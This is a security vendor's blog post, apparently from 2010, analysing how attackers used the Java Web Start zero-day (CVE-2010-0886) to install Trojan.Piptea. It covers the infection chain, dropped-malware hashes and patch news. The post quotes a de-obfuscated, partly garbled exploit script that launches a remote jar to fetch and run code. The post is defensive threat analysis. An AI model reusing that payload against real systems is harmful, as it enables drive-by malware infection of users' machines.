Who is Exploiting the Java Zero-Day?

Update: Oracle released an emergency patch recently to fix this major flaw. See details in the bottom.


The recent discovery of a 0-day design flaw in the 'Java Web Start' module has opened new avenues for malware drive by attacks.  This flaw was exposed by Tavis Ormandy a few days back and it did not take a long time for bad guys to start using the proof of concept code for real exploitation.  I have been reading about the exploit details for the last few days, but very few details were available on the active use of this exploit.  Who are the guys using this exploit and for spreading what?  This article is all about this, with emphasis on the post infection stuff.

Users who are interested in the inner workings of this 0-day flaw itself, can read the full disclosure here.

It all started like this… yesterday afternoon my colleague Stuart Staniford pointed me to a malicious domain hxxp:// (dead at the moment) which he believed seemed to be exploiting this 0-day flaw.  After a little analysis, I found it to be true indeed.  Here are the details of my findings after a detailed analysis.

The whois record shows that was registered around April 8th, 2010 (a day before Travis's public disclosure).

The sequence of events after I opened from my lab were like this:

1. hxxp://  [main exploit page]

2. hxxp:// [sub exploit page, loaded from main page]

3. hxxp://      [path to the .jar file, which further downloaded the first level malware]

4. hxxp://  [actual malware (Trojan.Piptea), windows PE binary]

5. Trojan.Piptea further dropped different pieces of malware onto the infected machine. I'll go into the malware details later on.


The main exploit page was highly obfuscated and looked like this:


This script, after de-obfuscation, would look like this:


As we can see above, that main script further loads hxxp:// After de-obfuscating the contents of value3.php, it looks like this: (Thanks to Julia Wolf for de-obfuscating it real quick)

var u = "http: -J-jar -J\\\\\\50035\\C0.php

(window.navigator.appName == "Microsoft Internet Explorer") {

        var o =

        o.classid = "clsid:CAFEEFAC-

        o.launch(u); }

        else {

               var o =

               var n =
document.createElement ("OBJECT");

               o.type =
"application/npruntime-scriptable-plugin;deploymenttoolkit"; n.type =
"application/java-deployment- toolkit"; document.body.appendChild(o);
document.body.appendChild (n);  try
{o.launch(u); } catch (e) {n.launch(u);



As we can see, the value3.php script in plain text looks very similar to the proof of concept code written by Tavis.

Successful execution of this this script on the vulnerable system would execute "/50035/C0.php",  a jar file (java self executable) on the vulnerable system which would further open gates for all types of badness.

The jar file after de-compilation looks like this:


It's clearly visible from the code that this jar file downloads and executes Trojan.Piptea from URL hxxp://  Trojan.Piptea is a powerful malware down-loader and part of a very big pay per install network.  In a sample run inside my virtual machine, Piptea dropped more than 6 different pieces of malware on the infected systems.  I am pretty sure the author of these 6 malware would have paid good enough money to the Piptea guys for dropping their creations across the Piptea zombies base.

The MD5s of these malware are:

0A557F250F96F31127AE3CB79B137D6E  — Trojan.Piptea

a370bfa39a4ebcef8b5e3ffb4cfcd594      –

e578a329bb6fcbafe8ec342eba3221e0    –

50c16385c80b65a5f41808a1e795638b    – 

f11ad564e29714149314489baceed9da    –

7cee3e1bf4e48dc0d70e93aa30f93e27     — Trojan.Fakerean

27B2A4F2D3DDF2A3187C324163EB9950  — Trojan.Piptea (Update)

d9965ca03c53e4f5de232a81e415a537    — Trojan.Ertfor

Users who want to learn more about the motives behind dropping multiple malware on the infected system may read my earlier articles about BotnetWeb written back in April 2009.

Researchers from TrendMicro recently (this April) also came up with a similar concept named as BotnetMap

It's pretty obvious that the simplicity and reliability of this exploit will make it a lethal weapon for the bad guys in coming days.  Plus, the unavailability of any working patch is making the overall picture scarier.  I am pretty sure that in the coming days, this exploit will become part of underground exploit kits.  This means that even a kiddie with basic computer skills and bad intentions can start making money out of this. Today ESET mentioned in their blog that they have seen this flaw being used in a targeted attack as well.

Tavis' disclosure also mentions some workarounds for IE and Firefox users. I would urge users to use these workarounds until a working patch becomes available. 


Professional IT users may visit the following link for technical details:

If you are looking for an easy way to update your home computer visit the following: and click on 'Free Java Download'

Atif Mushtaq @ FireEye Malware Intelligence Lab

Detailed Question/Comments : research SHIFT-2 fireeye DOT COM

3 thoughts on “Who is Exploiting the Java Zero-Day?

  1. Nice work.
    The quoted script attempts to exploit Firefox and Chrome as well, this is done using the “o” and “n” objects

  2. This vulnerability have been silently fixed in the most recent java update (Yesterday)

  3. FYI. Looks like your research posts are having a positive effect!!
    >> Oracle Security Alert CVE-2010-0886
    This Security Alert addresses security issues CVE-2010-0886 and CVE-2010-0887, which are vulnerabilities in desktop Java running in web browsers … These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. For a successful exploit, a user running an affected release in their browser will need to visit a malicious web page that exploits this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.
    Supported Products Affected
    Java SE
    • JDK and JRE 6 for Windows, Solaris, and Linux
    Java for Business
    • JDK and JRE 6 for Windows, Solaris and Linux
    Patch Availability
    Customers who use default Java installation settings that include the automatic update of Java for security and other issues will have these fixes automatically applied over the next 30 days. Customers who do not have automatic update enabled or who want to immediately apply these important fixes, as is recommended by Oracle… (SEE URL FOR FULL DETAILS)

Comments are closed.